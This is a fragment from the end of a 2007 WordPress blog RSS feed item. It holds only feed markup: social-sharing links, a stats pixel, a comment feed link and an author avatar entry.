<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/5/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/5/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=5&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/01/mm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>
	</item>
	</channel>
</rss>
